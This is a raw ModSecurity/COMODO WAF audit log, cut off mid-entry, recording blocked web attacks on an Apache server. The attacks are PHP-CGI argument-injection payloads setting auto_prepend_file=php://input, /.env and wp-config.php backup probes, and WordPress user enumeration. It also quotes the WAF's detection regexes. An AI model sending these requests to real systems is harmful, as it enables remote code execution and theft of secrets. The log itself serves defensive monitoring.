103.236.140.4 8181 --2840144b-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 185.213.174.118 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 185.213.174.118 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --2840144b-C-- --2840144b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2840144b-E-- --2840144b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745699786288067 5206 (- - -) Stopwatch2: 1745699786288067 5206; combined=3524, p1=540, p2=2921, p3=0, p4=0, p5=63, sr=127, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2840144b-Z-- --4624a32d-A-- [27/Apr/2025:03:46:28 +0700] aA1GJCKLpK55oNIcEw0Y6AAAAEU 103.236.140.4 35378 103.236.140.4 8181 --4624a32d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 157.230.154.6 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 157.230.154.6 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --4624a32d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4624a32d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745700388739139 1044 (- - -) Stopwatch2: 1745700388739139 1044; combined=439, p1=407, p2=0, p3=0, p4=0, p5=32, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4624a32d-Z-- --85ab5858-A-- [27/Apr/2025:04:16:14 +0700] aA1NHiKLpK55oNIcEw0amgAAAE4 103.236.140.4 42190 103.236.140.4 8181 --85ab5858-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.139.45.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.139.45.163 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --85ab5858-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --85ab5858-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745702174829350 755 (- - -) Stopwatch2: 1745702174829350 755; combined=312, p1=273, p2=0, p3=0, p4=0, p5=38, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --85ab5858-Z-- --eff85831-A-- [27/Apr/2025:04:16:15 +0700] aA1NH_7FMV4FIoAOnu7FjQAAAAE 103.236.140.4 42198 103.236.140.4 8181 --eff85831-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.139.45.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.139.45.163 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --eff85831-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eff85831-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745702175864969 777 (- - -) Stopwatch2: 1745702175864969 777; combined=304, p1=268, p2=0, p3=0, p4=0, p5=35, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eff85831-Z-- --ea3e3472-A-- [27/Apr/2025:05:12:34 +0700] aA1aUiKLpK55oNIcEw0eBwAAAEc 103.236.140.4 55118 103.236.140.4 8181 --ea3e3472-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Opera/9.80 (Android 4.0.4; Linux; Opera Mobi/ADR-1205181138; U; pl) Presto/2.10.254 Version/12.00 Accept-Charset: utf-8 --ea3e3472-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea3e3472-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745705554130652 734 (- - -) Stopwatch2: 1745705554130652 734; combined=293, p1=258, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea3e3472-Z-- --1ad1b530-A-- [27/Apr/2025:05:18:49 +0700] aA1byf7FMV4FIoAOnu7KPQAAAAs 103.236.140.4 56546 103.236.140.4 8181 --1ad1b530-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.137.162 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.137.162 X-Forwarded-Proto: http Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --1ad1b530-C-- --1ad1b530-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1ad1b530-E-- --1ad1b530-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745705929335810 4124 (- - -) Stopwatch2: 1745705929335810 4124; combined=2649, p1=473, p2=2147, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1ad1b530-Z-- --e82cf335-A-- [27/Apr/2025:05:23:29 +0700] aA1c4RkilNlaTSHUe098JgAAAJc 103.236.140.4 57610 103.236.140.4 8181 --e82cf335-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7 MG(Novarra-Vision/6.9) Accept-Charset: utf-8 --e82cf335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e82cf335-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745706209640835 780 (- - -) Stopwatch2: 1745706209640835 780; combined=304, p1=265, p2=0, p3=0, p4=0, p5=39, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e82cf335-Z-- --02564919-A-- [27/Apr/2025:05:48:36 +0700] aA1ixMO7TUCRYJ_xflcVYwAAAMI 103.236.140.4 35204 103.236.140.4 8181 --02564919-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.71.106 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.71.106 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.0.0; SM-G930V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --02564919-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --02564919-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745707716897223 884 (- - -) Stopwatch2: 1745707716897223 884; combined=360, p1=321, p2=0, p3=0, p4=0, p5=38, sr=89, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02564919-Z-- --c5d70f1d-A-- [27/Apr/2025:06:10:19 +0700] aA1n28O7TUCRYJ_xflcXPQAAAMI 103.236.140.4 43360 103.236.140.4 8181 --c5d70f1d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.86 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.86 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux 3.8-6.dmz.1-liquorix-686) KHTML/4.8.4 (like Gecko) Konqueror/4.8 Accept-Charset: utf-8 --c5d70f1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5d70f1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745709019994114 802 (- - -) Stopwatch2: 1745709019994114 802; combined=376, p1=346, p2=0, p3=0, p4=0, p5=30, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5d70f1d-Z-- --bfca1c4b-A-- [27/Apr/2025:07:47:51 +0700] aA1-t8O7TUCRYJ_xflce1wAAANI 103.236.140.4 40880 103.236.140.4 8181 --bfca1c4b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://smkn22-jkt.sch.id Host: smkn22-jkt.sch.id X-Real-IP: 45.206.72.214 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.206.72.214 X-Forwarded-Proto: https Connection: close Origin: https://smkn22-jkt.sch.id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 --bfca1c4b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bfca1c4b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745714871762539 3062 (- - -) Stopwatch2: 1745714871762539 3062; combined=1373, p1=424, p2=916, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bfca1c4b-Z-- --76749f19-A-- [27/Apr/2025:08:13:35 +0700] aA2EvxkilNlaTSHUe0-G5AAAAII 103.236.140.4 46862 103.236.140.4 8181 --76749f19-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.5(0x17000523) NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --76749f19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --76749f19-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745716415078615 748 (- - -) Stopwatch2: 1745716415078615 748; combined=313, p1=273, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76749f19-Z-- --a06e260b-A-- [27/Apr/2025:08:14:27 +0700] aA2E88O7TUCRYJ_xflcgJwAAANc 103.236.140.4 47062 103.236.140.4 8181 --a06e260b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: W3C_Validator/1.305.2.12 libwww-perl/5.64 Accept-Charset: utf-8 --a06e260b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a06e260b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745716467081081 834 (- - -) Stopwatch2: 1745716467081081 834; combined=354, p1=313, p2=0, p3=0, p4=0, p5=41, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a06e260b-Z-- --51398832-A-- [27/Apr/2025:09:13:26 +0700] aA2SxhkilNlaTSHUe0-L5QAAAJM 103.236.140.4 38520 103.236.140.4 8181 --51398832-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 157.230.154.6 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 157.230.154.6 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --51398832-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --51398832-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745720006177532 965 (- - -) Stopwatch2: 1745720006177532 965; combined=403, p1=350, p2=0, p3=0, p4=0, p5=52, sr=122, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --51398832-Z-- --28570e5e-A-- [27/Apr/2025:09:42:48 +0700] aA2ZqP7FMV4FIoAOnu7e4wAAABc 103.236.140.4 45382 103.236.140.4 8181 --28570e5e-B-- GET /wp-config.php2 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --28570e5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28570e5e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721768237064 870 (- - -) Stopwatch2: 1745721768237064 870; combined=376, p1=335, p2=0, p3=0, p4=0, p5=41, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28570e5e-Z-- --2e63ed5a-A-- [27/Apr/2025:09:42:48 +0700] aA2ZqMO7TUCRYJ_xflcmygAAAMo 103.236.140.4 45384 103.236.140.4 8181 --2e63ed5a-B-- GET /wp-config.php3 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --2e63ed5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2e63ed5a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721768771390 857 (- - -) Stopwatch2: 1745721768771390 857; combined=358, p1=310, p2=0, p3=0, p4=0, p5=48, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2e63ed5a-Z-- --fc9d9b03-A-- [27/Apr/2025:09:42:49 +0700] aA2ZqRkilNlaTSHUe0-NjQAAAIs 103.236.140.4 45390 103.236.140.4 8181 --fc9d9b03-B-- GET /wp-config.php4 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --fc9d9b03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc9d9b03-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721769653253 826 (- - -) Stopwatch2: 1745721769653253 826; combined=352, p1=316, p2=0, p3=0, p4=0, p5=36, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc9d9b03-Z-- --bb9b263f-A-- [27/Apr/2025:09:42:50 +0700] aA2Zqv7FMV4FIoAOnu7e5QAAAAM 103.236.140.4 45396 103.236.140.4 8181 --bb9b263f-B-- GET /wp-config.php5 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --bb9b263f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb9b263f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721770180462 747 (- - -) Stopwatch2: 1745721770180462 747; combined=316, p1=268, p2=0, p3=0, p4=0, p5=47, sr=105, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb9b263f-Z-- --d6449d32-A-- [27/Apr/2025:09:42:50 +0700] aA2ZqhkilNlaTSHUe0-NjgAAAIo 103.236.140.4 45398 103.236.140.4 8181 --d6449d32-B-- GET /wp-config.php6 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --d6449d32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d6449d32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745721770726919 668 (- - -) Stopwatch2: 1745721770726919 668; combined=251, p1=217, p2=0, p3=0, p4=0, p5=33, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d6449d32-Z-- --4eebb33d-A-- [27/Apr/2025:09:42:51 +0700] aA2ZqyKLpK55oNIcEw0tqwAAAFA 103.236.140.4 45404 103.236.140.4 8181 --4eebb33d-B-- GET /wp-config.php7 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 192.42.116.173 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.42.116.173 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* --4eebb33d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4eebb33d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line 